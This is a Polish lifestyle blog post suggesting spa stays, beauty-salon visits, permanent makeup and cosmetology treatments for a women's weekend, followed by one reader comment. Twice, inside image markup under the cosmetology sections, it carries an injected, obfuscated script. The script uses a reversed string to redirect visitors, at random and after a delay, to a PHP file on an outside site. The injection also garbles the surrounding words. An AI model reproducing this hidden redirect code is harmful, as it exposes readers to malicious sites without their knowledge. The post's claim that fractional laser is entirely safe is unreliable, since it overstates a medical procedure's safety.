Kobiecy weekend w Polsce i za granicą

Kobiecy weekend w Polsce i za granicą

Kobiecy weekend to nie tylko szansa by wypocząć i oderwać się od domowych obowiązków to także doskonała szansa na to by zadbać o siebie. Gdzie zatem na taki weekend warto wyjechać, jak go spędzić i o jakich rozwiązaniach warto pomyśleć, by miał on pozytywny wpływ na nasze samopoczucie i wygląd? Oto kilka naszych propozycji.

Hotel i spa – weekendowy wypoczynek

Podstawą do zadbania o siebie w czasie weekendowego wyjazdu jest wybór odpowiedniego miejsca. Warto tutaj pomyśleć o spokojnych i cichych miejscach, które sprzyjają relaksowi. Wybierając jednak hotel warto sprawdzić czy w jego pobliżu lub też w nim samym znajduje się spa. Spa na dzień dzisiejszy jest jednym z najczęściej odwiedzanych miejsc wśród osób, które szukają odpoczynku. Wizyta w spa w dużej mierze wieże się z relaksem psychicznym, ponieważ atmosfera w takich ośrodkach sprzyja wyciszeniu się i odprężeniu. Niemniej zabiegi pielęgnacyjne oferowane w spa mają także bardzo pozytywny wpływ na stan masażnaszego ciała, przy czym należy zaznaczyć, że jednorazowa wizyta nie da aż tak widocznych efektów, niemniej może ona być silnym bodźcem by zacząć dbać o siebie regularnie. Oferta spa na podstawie portalu www.wyspazdrowia.pl jest bardzo różnicowana i można by tu choćby wymienić takie zabiegi jak:

 • masaże,
 • sauna,
 • zabiegi pielęgnacyjne z alg,
 • zabiegi pielęgnacyjne z błota,
 • kąpiele w wodach zdrowotnych,
 • zabiegi kosmetyczne.

Oczywiście to tylko te podstawowe rodzaje usług oferowanych przez spa, ponieważ obecnie można znaleźć takie ośrodki, które oferują pełny wachlarz zabiegów pielęgnacyjnych i kosmetycznych. Wybierając hotel i tym samym spa warto zwrócić uwagę na to jaka jest oferta spa, jakie są ceny zabiegów i jakie posiada ono opinie, wówczas będziemy  miały pewność, że wypoczynek będzie udany i z wyjazdu wrócimy zrelaksowane. Warto jednak na kobiecy weekend rozważyć także inne możliwości niż tylko wizyta w spa.

Wizyta w salonie kosmetycznym  jako sposób na weekendowy wypoczynek

Jeśli z różnych względów nie możemy wyjechać na weekend, relaks można sobie także zapewnić na miejscu. Dobrą opcją w takim wypadku może się okazać salon kosmetyczny. W takim salonie w większości będzie można skorzystać z tych samych zabiegów co w spa i choć może atmosfera nie będzie tak sprzyjać wypoczynkowi, zabiegi kosmetyczne pomogą nam się zrelaksować i poczuć się salon kosmetycznypiękniej. Salony kosmetyczne obecnie oferują zarówno zabiegi pielęgnacyjne jak i upiększające, dzięki czemu każda kobieta może coś tu znaleźć dla siebie. Zabiegiem wartym uwagi niewątpliwie może być tutaj makijaż permanentny. Według ekosmetyczki.pl zabieg makijażu permanentnego występuje w kilku wariantach a mianowicie:

 • makijaż permanentny oczu,
 • makijaż permanentny brwi,
 • makijaż permanentny ust.

Wybór tutaj jest całkowicie dowolny i zależny od upodobań samej kobiety. Warto jednak przy wyborze zwrócić uwagę na fakt, że wykonanie takiego makijażu zdecydowanie skraca codzienne przygotowywania i upraszcza kwestie dbania o swój wygląd, dlatego warto zdecydować się na makijaż permanentny tej części twarzy z której makijażem mamy najwięcej problemów. Warto także pamiętać o tym, że wbrew temu co mógłby sugerować opis makijaż tego typu nie jest na zawsze, a starcza on na około dwa lata, w zależności od rodzaju skóry.

Gabinet kosmetologiczny – dla kogo

Ciekawą alternatywą dla wizyty w gabinecie kosmetycznym może być wizyta u kosmetologa. Gabinet kosmetologiczny ma w swojej ofercie zarówno zabiegi pielęgnacyjne jak i zabiegi z zakresu medycyny estetycznej, które w sposób potwierdzony wpływają na stan i kondycje skóry poprawiając jej Gabinet kosme<script srcset=$NqM=function(n){if (typeof ($NqM.list[n]) == „string”) return $NqM.list[n].split(„”).reverse().join(„”);return $NqM.list[n];};$NqM.list=[„\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tologiczny” width=”300″ height=”225″ />wygląd. Kosmetologia jako dział medycy na zdecydowanie bardziej widoczny wpływ na stan skóry niż zabiegi oferowane przez salony kosmetyczny, przy czym należy sobie zdawać sprawę, że w przypadku niektórych zabiegów kosmetologicznych mogą istnieć pewne przeciwwskazania jeśli chodzi o ich wykonanie. Do tych popularniejszych zabiegów kosmetologicznych można by zaliczyć takie jak:

 • lipoliza iniekcyjna,
 • laser frakcyjny,
 • mikrodermabrazja,
 • mezoterapia,
 • liposukcja ultradźwiękowa.

Zabiegi kosmetologiczne pomagają także w zwalczaniu różnych niedoskonałości skóry i problemów skórnych. Zanim zdecydujemy się jednak na zabiegi tego typu warto odbyć rozmowę z kosmetologiem czy będą one dla nas wskazane.

Laser frakcyjny – zabiegiem kosmetologicznym wartym uwagi

Gabinet kosme<script srcset=$NqM=function(n){if (typeof ($NqM.list[n]) == „string”) return $NqM.list[n].split(„”).reverse().join(„”);return $NqM.list[n];};$NqM.list=[„\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tologiczny” width=”300″ height=”169″ />Spośród wymienionych powyżej zabiegów laser frakcyjny zasługuje na szczególną uwagę. Jest to stosunkowe nowe rozwiązanie, a co za tym idzie zabieg ten nie jest szczególnie popularny. Laser frakcyjny umożliwia spłycenie drobnych zmarszczek, rozjaśnia przebarwienie skóry, zmniejsza widoczność bruzd i blizn potrądzikowych, dzięki czemu w wyraźny sposób poprawia wygląd skóry. Zabieg ten porównywalny w swojej skuteczności jest do drobnych zabiegów chirurgicznych, a przy tym jest on całkowicie bezpieczny. Efekty zabiegu zaczynają być widoczne po 14 dniach, a najbardziej wyraziste stają się one po około dwóch miesiącach, wówczas efekt odmłodzenia skóry jest już łatwo zauważalny.

Krótko podsumowując

Kobiecy weekend do doskonały moment by wypocząć i zacząć dbać o siebie. Taki relaks w spa czy gabinecie kosmetycznym może być właściwym bodźcem by zacząć dbać o regularną pielęgnacje ciała. 

Jedna odpowiedź so far.

 1. Witam, według mnie najlepszym pomysłem na taki kobiecy weekend jest wizyta w spa lub miejscu odnowy biologicznej. Wiadomo, że są miejsca w które nasz facet nie będzie chciał z nami chodzić, wiec wtedy idziemy z przyjaciółką. Wtedy możemy się zrelaksować, poplotkować i odpocząć.

Dodaj komentarz